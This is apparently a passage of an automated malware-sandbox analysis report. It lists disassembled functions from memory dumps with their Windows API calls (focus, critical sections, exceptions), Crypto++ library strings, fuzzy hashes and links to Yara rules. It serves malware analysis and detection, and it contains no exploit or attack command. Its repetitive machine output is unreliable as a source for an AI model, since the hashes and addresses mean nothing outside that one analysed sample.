                                                                                                                • Associated: 00000001.00000002.283969432.00000000012AC000.00000008.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284553157.0000000001388000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284568622.000000000138C000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284595520.000000000138D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: Parent$Focus
                                                                                                                • String ID:
                                                                                                                • API String ID: 384096180-0
                                                                                                                • Opcode ID: 7cf8c6154d8d80fb5f3ea09a51b2a4f0d6a2002703cefcd2c0669faae897c625
                                                                                                                • Instruction ID: 59f9737924365c27f240d014648ebf2f326412a34dbc039b5907616abffada5f
                                                                                                                • Opcode Fuzzy Hash: 7cf8c6154d8d80fb5f3ea09a51b2a4f0d6a2002703cefcd2c0669faae897c625
                                                                                                                • Instruction Fuzzy Hash: 45F012317203559BCF217B75ED18E6F36ADBFD8210B050969E986C31A0EB35DC908B24
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0127D273, Relevance: 6.0, APIs: 4, Instructions: 33windowkeyboardCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • IsWindow.USER32(?), ref: 0127D074
                                                                                                                • GetFocus.USER32 ref: 0127D07E
                                                                                                                  • Part of subcall function 0127D48B: IsWindow.USER32(?), ref: 0127D499
                                                                                                                  • Part of subcall function 0127D48B: GetParent.USER32(?), ref: 0127D4B6
                                                                                                                • IsWindow.USER32(?), ref: 0127D095
                                                                                                                • GetFocus.USER32 ref: 0127D09F
                                                                                                                • GetKeyState.USER32 ref: 0127D105
                                                                                                                • IsDialogMessageA.USER32(?,?), ref: 0127D207
                                                                                                                • GetFocus.USER32 ref: 0127D217
                                                                                                                • GetFocus.USER32(00000000), ref: 0127D231
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.283909709.0000000001261000.00000020.00020000.sdmp, Offset: 01260000, based on PE: true
                                                                                                                • Associated: 00000001.00000002.283885818.0000000001260000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283942193.0000000001299000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283960003.00000000012AA000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283969432.00000000012AC000.00000008.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284553157.0000000001388000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284568622.000000000138C000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284595520.000000000138D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: Focus$Window$DialogMessageParentState
                                                                                                                • String ID:
                                                                                                                • API String ID: 861580548-0
                                                                                                                • Opcode ID: fb8a9b8306cc6d2ed06e4a5399230cce85844e45a2de89923216917658c9ec7a
                                                                                                                • Instruction ID: ca7f74f944ec5d129c1ce55b3c533bf6582b017d47cf7f24f1c2128d7cde0303
                                                                                                                • Opcode Fuzzy Hash: fb8a9b8306cc6d2ed06e4a5399230cce85844e45a2de89923216917658c9ec7a
                                                                                                                • Instruction Fuzzy Hash: 3BF05E3162021AABAF217BF4AC0997F7A7CFFA06647105108E55192184DA319942CB61
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 01267823, Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • EnableWindow.USER32(00000000,?), ref: 01267848
                                                                                                                • GetActiveWindow.USER32 ref: 01267852
                                                                                                                • SetActiveWindow.USER32(00000000,?,00000028,0126147C), ref: 0126785E
                                                                                                                • FreeResource.KERNEL32(?,?,00000028,0126147C), ref: 0126787A
                                                                                                                  • Part of subcall function 0126F2A6: EnableWindow.USER32(?,00000028), ref: 0126F2B8
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.283909709.0000000001261000.00000020.00020000.sdmp, Offset: 01260000, based on PE: true
                                                                                                                • Associated: 00000001.00000002.283885818.0000000001260000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283942193.0000000001299000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283960003.00000000012AA000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283969432.00000000012AC000.00000008.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284553157.0000000001388000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284568622.000000000138C000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284595520.000000000138D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: Window$ActiveEnable$FreeResource
                                                                                                                • String ID:
                                                                                                                • API String ID: 253586258-0
                                                                                                                • Opcode ID: 80af4161aecc192a1c08e0f614e1169007797fcff6f86c4532bc87802bfa10ee
                                                                                                                • Instruction ID: c463cc06880dc02562305e950a058001314b1f20c88b82c4cfe147745a4786fe
                                                                                                                • Opcode Fuzzy Hash: 80af4161aecc192a1c08e0f614e1169007797fcff6f86c4532bc87802bfa10ee
                                                                                                                • Instruction Fuzzy Hash: 29F06D345102069BDF22ABACE4886ADBBB5BF48728F20005CE252622D0C77058C1DF41
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 01281B25, Relevance: 6.0, APIs: 4, Instructions: 24COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetTickCount.KERNEL32 ref: 01281B48
                                                                                                                • GetTickCount.KERNEL32 ref: 01281B55
                                                                                                                • CoFreeUnusedLibraries.OLE32 ref: 01281B64
                                                                                                                • GetTickCount.KERNEL32 ref: 01281B6A
                                                                                                                  • Part of subcall function 01281AC7: CoFreeUnusedLibraries.OLE32 ref: 01281B0D
                                                                                                                  • Part of subcall function 01281AC7: OleUninitialize.OLE32 ref: 01281B13
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.283909709.0000000001261000.00000020.00020000.sdmp, Offset: 01260000, based on PE: true
                                                                                                                • Associated: 00000001.00000002.283885818.0000000001260000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283942193.0000000001299000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283960003.00000000012AA000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283969432.00000000012AC000.00000008.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284553157.0000000001388000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284568622.000000000138C000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284595520.000000000138D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: CountTick$FreeLibrariesUnused$Uninitialize
                                                                                                                • String ID:
                                                                                                                • API String ID: 685759847-0
                                                                                                                • Opcode ID: 87716bea60357e758d49a68e2ff961be03193f9facd9580cdca1732ad5357b1d
                                                                                                                • Instruction ID: 22e3ee6ce3b2bf3d45a81e1b5063bc3064e1e89fcad8b68b13f0138b4535727c
                                                                                                                • Opcode Fuzzy Hash: 87716bea60357e758d49a68e2ff961be03193f9facd9580cdca1732ad5357b1d
                                                                                                                • Instruction Fuzzy Hash: B0E065304162289FDF20FF68F80876D3BA8EF00315F44442BD606860C4E7B65461CB91
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 10015793, Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 249memoryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • _Allocate.LIBCPMT ref: 100157B6
                                                                                                                  • Part of subcall function 100611EC: std::exception::exception.LIBCMT ref: 100611FF
                                                                                                                  • Part of subcall function 100611EC: __CxxThrowException@8.LIBCMT ref: 10061214
                                                                                                                • __EH_prolog3_GS.LIBCMT ref: 10015951
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.285888122.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000001.00000002.285875258.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.285982320.00000000100A8000.00000002.00000001.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.286024378.00000000100D0000.00000004.00000001.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.286047522.00000000100DB000.00000002.00000001.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: AllocateException@8H_prolog3_Throwstd::exception::exception
                                                                                                                • String ID: vector<T> too long
                                                                                                                • API String ID: 3822448794-3788999226
                                                                                                                • Opcode ID: a65010df75fe572cf350389fec5a09afcc39927b198b9c8f24212247224d5ca2
                                                                                                                • Instruction ID: 1f01bda6b090f0fb6ae29a602f3b7ebef2aa81a1fc4cba0bbe400f0443ab7f41
                                                                                                                • Opcode Fuzzy Hash: a65010df75fe572cf350389fec5a09afcc39927b198b9c8f24212247224d5ca2
                                                                                                                • Instruction Fuzzy Hash: 69711675A00605EFDB10CB68C881A9DB3E5FF48361F28812AE915AF180DB72E9C18B52
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 10062A80, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 127COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • __CxxThrowException@8.LIBCMT ref: 10062BA0
                                                                                                                  • Part of subcall function 10082C9B: RaiseException.KERNEL32(?,?,10061219,?,?,E05FA6D8,?,?,?,?,10061219,?,100CCC84,E05FA6D8), ref: 10082CF0
                                                                                                                Strings
                                                                                                                • BlockPaddingScheme, xrefs: 10062BFF
                                                                                                                • StreamTransformationFilter: please use AuthenticatedEncryptionFilter and AuthenticatedDecryptionFilter for AuthenticatedSymmetricCipher, xrefs: 10062B31
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.285888122.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000001.00000002.285875258.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.285982320.00000000100A8000.00000002.00000001.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.286024378.00000000100D0000.00000004.00000001.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.286047522.00000000100DB000.00000002.00000001.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: ExceptionException@8RaiseThrow
                                                                                                                • String ID: BlockPaddingScheme$StreamTransformationFilter: please use AuthenticatedEncryptionFilter and AuthenticatedDecryptionFilter for AuthenticatedSymmetricCipher
                                                                                                                • API String ID: 3976011213-3582606076
                                                                                                                • Opcode ID: c7b99788cf531e7e7b900d22ee560d1103ce18fdf4b4aa69aa40edb6bb2af7fb
                                                                                                                • Instruction ID: a1bf6da14567f7f202df8ad15e40d9f5d6120f6cf0205bc0812ca1595c716f15
                                                                                                                • Opcode Fuzzy Hash: c7b99788cf531e7e7b900d22ee560d1103ce18fdf4b4aa69aa40edb6bb2af7fb
                                                                                                                • Instruction Fuzzy Hash: 395135B4608B81AFD310CF28C844B9ABBE5FF89714F100A1DF59587791D7B6E854CB92
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 01271DAD, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 105COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • __EH_prolog3_GS.LIBCMT ref: 01271DB4
                                                                                                                • CoCreateGuid.OLE32(?,?,?,?,?,?,?,?,?,?,?,?,?,0000002C), ref: 01271E03
                                                                                                                  • Part of subcall function 01263A60: _memcpy_s.LIBCMT ref: 01263AC4
                                                                                                                  • Part of subcall function 01263A37: _strlen.LIBCMT ref: 01263A4A
                                                                                                                  • Part of subcall function 01263A60: _strnlen.LIBCMT ref: 01263A8D
                                                                                                                Strings
                                                                                                                • %08lX%04X%04x%02X%02X%02X%02X%02X%02X%02X%02X, xrefs: 01271E53
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.283909709.0000000001261000.00000020.00020000.sdmp, Offset: 01260000, based on PE: true
                                                                                                                • Associated: 00000001.00000002.283885818.0000000001260000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283942193.0000000001299000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283960003.00000000012AA000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283969432.00000000012AC000.00000008.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284553157.0000000001388000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284568622.000000000138C000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284595520.000000000138D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: CreateGuidH_prolog3__memcpy_s_strlen_strnlen
                                                                                                                • String ID: %08lX%04X%04x%02X%02X%02X%02X%02X%02X%02X%02X
                                                                                                                • API String ID: 1376112619-1017209998
                                                                                                                • Opcode ID: 5efefe7321e65f2ef2f8448532671bb4059d4bfe274d6fde0c7a6fb70adc3b0d
                                                                                                                • Instruction ID: f0ffbd6ca0d2b4d849f999994c747cf413f1498f5c9f31a682765e5657b70579
                                                                                                                • Opcode Fuzzy Hash: 5efefe7321e65f2ef2f8448532671bb4059d4bfe274d6fde0c7a6fb70adc3b0d
                                                                                                                • Instruction Fuzzy Hash: 81415B71A1015AAFCF05EBE8C894AFEBBBDAF6D210F040059F541F7281DA789E44DB60
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 10065520, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 94COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • __CxxThrowException@8.LIBCMT ref: 10065631
                                                                                                                  • Part of subcall function 10082C9B: RaiseException.KERNEL32(?,?,10061219,?,?,E05FA6D8,?,?,?,?,10061219,?,100CCC84,E05FA6D8), ref: 10082CF0
                                                                                                                Strings
                                                                                                                • InputBuffer, xrefs: 1006558F
                                                                                                                • StringStore: missing InputBuffer argument, xrefs: 100655AE
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.285888122.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000001.00000002.285875258.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.285982320.00000000100A8000.00000002.00000001.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.286024378.00000000100D0000.00000004.00000001.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.286047522.00000000100DB000.00000002.00000001.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: ExceptionException@8RaiseThrow
                                                                                                                • String ID: InputBuffer$StringStore: missing InputBuffer argument
                                                                                                                • API String ID: 3976011213-2380213735
                                                                                                                • Opcode ID: fea13f389e7ee5196132048e30c4bee4f6078b727d40618e5fa3adf984a5c76b
                                                                                                                • Instruction ID: f3b2fb289752e224a9be008091d02749d6a9aa09e3115448d6745c317642e968
                                                                                                                • Opcode Fuzzy Hash: fea13f389e7ee5196132048e30c4bee4f6078b727d40618e5fa3adf984a5c76b
                                                                                                                • Instruction Fuzzy Hash: 1D4113751087819FD310CF28C854B5BFBE4EB99724F108A1EF5A987291D7B9E908CB93
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 10007199, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 59COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • __EH_prolog3_catch.LIBCMT ref: 100071A0
                                                                                                                • Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception.LIBCPMT ref: 100071CE
                                                                                                                  • Part of subcall function 1008094B: _malloc.LIBCMT ref: 10080963
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.285888122.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000001.00000002.285875258.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.285982320.00000000100A8000.00000002.00000001.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.286024378.00000000100D0000.00000004.00000001.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.286047522.00000000100DB000.00000002.00000001.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: Concurrency::details::_Concurrent_queue_base_v4::_H_prolog3_catchInternal_throw_exception_malloc
                                                                                                                • String ID: H
                                                                                                                • API String ID: 1551749410-2852464175
                                                                                                                • Opcode ID: 381d61d2a41d72e9d4949d35f1ebc1c6f417d2ffb91868a8cc174ff3c01234ad
                                                                                                                • Instruction ID: c9523048e6bb33610a6b9af6bf7d3037b8ab691e29440540b33252c0e33c8335
                                                                                                                • Opcode Fuzzy Hash: 381d61d2a41d72e9d4949d35f1ebc1c6f417d2ffb91868a8cc174ff3c01234ad
                                                                                                                • Instruction Fuzzy Hash: 001184B5D012179FDB04CF98C89259EBBB4FF04390F10802AF908A7245DB74AA51CBD1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 10002CAE, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 48COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • __EH_prolog3.LIBCMT ref: 10002CB5
                                                                                                                  • Part of subcall function 100075EC: __EH_prolog3.LIBCMT ref: 100075F3
                                                                                                                  • Part of subcall function 10007F24: __EH_prolog3.LIBCMT ref: 10007F2B
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.285888122.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000001.00000002.285875258.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.285982320.00000000100A8000.00000002.00000001.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.286024378.00000000100D0000.00000004.00000001.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.286047522.00000000100DB000.00000002.00000001.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: H_prolog3
                                                                                                                • String ID: DecodingLookupArray$Log2Base
                                                                                                                • API String ID: 431132790-3088352070
                                                                                                                • Opcode ID: d7a0f048c14b7ded22b99a2aca4ee42167c61facf5675e500e18677374664173
                                                                                                                • Instruction ID: 3d682f9d0e1d11778a2ee328bf4ea193dd09e96cd53b292eb81da0202ad69263
                                                                                                                • Opcode Fuzzy Hash: d7a0f048c14b7ded22b99a2aca4ee42167c61facf5675e500e18677374664173
                                                                                                                • Instruction Fuzzy Hash: 471186B58007489ED715DFA58811AEFBBF9FF55300F00454EF19697242CBB8A605D7A1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 10002717, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 43COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • __EH_prolog3_GS.LIBCMT ref: 1000271E
                                                                                                                  • Part of subcall function 10001FA8: __EH_prolog3.LIBCMT ref: 10001FAF
                                                                                                                  • Part of subcall function 100069AE: _memmove.LIBCMT ref: 100069CE
                                                                                                                Strings
                                                                                                                • " not used, xrefs: 10002745
                                                                                                                • AlgorithmParametersBase: parameter ", xrefs: 1000272B
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.285888122.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000001.00000002.285875258.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.285982320.00000000100A8000.00000002.00000001.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.286024378.00000000100D0000.00000004.00000001.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.286047522.00000000100DB000.00000002.00000001.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: H_prolog3H_prolog3__memmove
                                                                                                                • String ID: " not used$AlgorithmParametersBase: parameter "
                                                                                                                • API String ID: 2549280591-612349224
                                                                                                                • Opcode ID: aabd292a265ad8cc8e6fc7a89bf5c79dd7c0fcdcda6cfe5613beeee4f667de7f
                                                                                                                • Instruction ID: 82355afe6ab1619c01f16a308ae327a282ffe12bcd73e53c8f5560ce08f48453
                                                                                                                • Opcode Fuzzy Hash: aabd292a265ad8cc8e6fc7a89bf5c79dd7c0fcdcda6cfe5613beeee4f667de7f
                                                                                                                • Instruction Fuzzy Hash: 80012CB8E40248AEFB00DAD0CC92FEEBB6DEF24394F540015B205A7186DBB56E55D662
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0129695E, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                  • Part of subcall function 012969B1: _memset.LIBCMT ref: 012969BE
                                                                                                                  • Part of subcall function 01261290: InitializeCriticalSectionEx.KERNEL32(?,00000000,00000000,0129698D,?,?,?,0126122E), ref: 01261295
                                                                                                                  • Part of subcall function 01261290: GetLastError.KERNEL32(?,?,?,0126122E), ref: 0126129F
                                                                                                                • IsDebuggerPresent.KERNEL32(?,?,?,0126122E), ref: 01296991
                                                                                                                • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,0126122E), ref: 012969A0
                                                                                                                Strings
                                                                                                                • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 0129699B
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.283909709.0000000001261000.00000020.00020000.sdmp, Offset: 01260000, based on PE: true
                                                                                                                • Associated: 00000001.00000002.283885818.0000000001260000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283942193.0000000001299000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283960003.00000000012AA000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283969432.00000000012AC000.00000008.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284553157.0000000001388000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284568622.000000000138C000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284595520.000000000138D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: CriticalDebugDebuggerErrorInitializeLastOutputPresentSectionString_memset
                                                                                                                • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                                                                                • API String ID: 2823744152-631824599
                                                                                                                • Opcode ID: 2ac2e4956b275e6488aa5caf48855f1f513aad2c231249c725c0351305a8715d
                                                                                                                • Instruction ID: 8ce2a5cbee1e7acd79cb27b08b031e8afd1e05a109c86ec159f87de23043593e
                                                                                                                • Opcode Fuzzy Hash: 2ac2e4956b275e6488aa5caf48855f1f513aad2c231249c725c0351305a8715d
                                                                                                                • Instruction Fuzzy Hash: 4EE092B02103028FEF309F2DE509B927BE8AF04394F00481DD896C3284EB71E088CB91
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 10007254, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • __EH_prolog3_GS.LIBCMT ref: 1000725B
                                                                                                                  • Part of subcall function 10001FA8: __EH_prolog3.LIBCMT ref: 10001FAF
                                                                                                                • __CxxThrowException@8.LIBCMT ref: 10007298
                                                                                                                  • Part of subcall function 10082C9B: RaiseException.KERNEL32(?,?,10061219,?,?,E05FA6D8,?,?,?,?,10061219,?,100CCC84,E05FA6D8), ref: 10082CF0
                                                                                                                Strings
                                                                                                                • AllocatorBase: requested size would cause integer overflow, xrefs: 10007269
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.285888122.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000001.00000002.285875258.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.285982320.00000000100A8000.00000002.00000001.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.286024378.00000000100D0000.00000004.00000001.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.286047522.00000000100DB000.00000002.00000001.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: ExceptionException@8H_prolog3H_prolog3_RaiseThrow
                                                                                                                • String ID: AllocatorBase: requested size would cause integer overflow
                                                                                                                • API String ID: 1139647276-10355266
                                                                                                                • Opcode ID: 89aff325725dc08a3ba5561847c2188838f406ee80c029bf02673c6b6b05705c
                                                                                                                • Instruction ID: 880eccf283e51666a9cf46081540bb9d499af34cbacec049841b5d615d9933b7
                                                                                                                • Opcode Fuzzy Hash: 89aff325725dc08a3ba5561847c2188838f406ee80c029bf02673c6b6b05705c
                                                                                                                • Instruction Fuzzy Hash: D4E01A78D10218EAEF10DBE0CC41BED7B38FF14351F904216F605AA096DBF9A648CB56
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 012704E1, Relevance: 5.1, APIs: 4, Instructions: 66COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • EnterCriticalSection.KERNEL32(?,01389E54,01389E70,00000001,?,?,?,?,00000000,01389E54,?,012706DA,00000004,012692B4,01266D6E,012692DD), ref: 01270546
                                                                                                                • LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,00000000,01389E54,?,012706DA,00000004,012692B4,01266D6E,012692DD,01266B4B,01296BCA), ref: 01270556
                                                                                                                • LocalFree.KERNEL32(?,?,?,?,?,00000000,01389E54,?,012706DA,00000004,012692B4,01266D6E,012692DD,01266B4B,01296BCA), ref: 0127055F
                                                                                                                • TlsSetValue.KERNEL32(?,00000000,?,?,?,?,00000000,01389E54,?,012706DA,00000004,012692B4,01266D6E,012692DD,01266B4B,01296BCA), ref: 01270571
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.283909709.0000000001261000.00000020.00020000.sdmp, Offset: 01260000, based on PE: true
                                                                                                                • Associated: 00000001.00000002.283885818.0000000001260000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283942193.0000000001299000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283960003.00000000012AA000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283969432.00000000012AC000.00000008.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284553157.0000000001388000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284568622.000000000138C000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284595520.000000000138D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: CriticalSection$EnterFreeLeaveLocalValue
                                                                                                                • String ID:
                                                                                                                • API String ID: 2949335588-0
                                                                                                                • Opcode ID: d2c33f238fb2cd5963ffa8c39c4464e42d3fd1325ebb0909a15bbadf4f287d96
                                                                                                                • Instruction ID: 4cb4cf4f4108a2a2ff2a1f1e2c073d944f92efaa74b94125db29eb56904c9df9
                                                                                                                • Opcode Fuzzy Hash: d2c33f238fb2cd5963ffa8c39c4464e42d3fd1325ebb0909a15bbadf4f287d96
                                                                                                                • Instruction Fuzzy Hash: 5021A231611215EFDB14DF58E888F6ABBA4FF0A311F40806CFA06CB250C730E951CB94
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 01270000, Relevance: 5.0, APIs: 4, Instructions: 34COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • EnterCriticalSection.KERNEL32(01389DA0,?,00000000,?,01270655,00000010,00000008,012692D3,01269311,01266D6E,012692DD,01266B4B,01296BCA,?,?,00000000), ref: 0127002F
                                                                                                                • InitializeCriticalSection.KERNEL32(00000000,?,00000000,?,01270655,00000010,00000008,012692D3,01269311,01266D6E,012692DD,01266B4B,01296BCA,?,?,00000000), ref: 01270045
                                                                                                                • LeaveCriticalSection.KERNEL32(01389DA0,?,00000000,?,01270655,00000010,00000008,012692D3,01269311,01266D6E,012692DD,01266B4B,01296BCA,?,?,00000000), ref: 01270057
                                                                                                                • EnterCriticalSection.KERNEL32(00000000,?,00000000,?,01270655,00000010,00000008,012692D3,01269311,01266D6E,012692DD,01266B4B,01296BCA,?,?,00000000), ref: 01270063
                                                                                                                  • Part of subcall function 0126FF97: InitializeCriticalSection.KERNEL32(01389DA0,0127001B,?,00000000,?,01270655,00000010,00000008,012692D3,01269311,01266D6E,012692DD,01266B4B,01296BCA), ref: 0126FFAF
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.283909709.0000000001261000.00000020.00020000.sdmp, Offset: 01260000, based on PE: true
                                                                                                                • Associated: 00000001.00000002.283885818.0000000001260000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283942193.0000000001299000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283960003.00000000012AA000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283969432.00000000012AC000.00000008.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284553157.0000000001388000.00000004.00020000.sdmp Download File
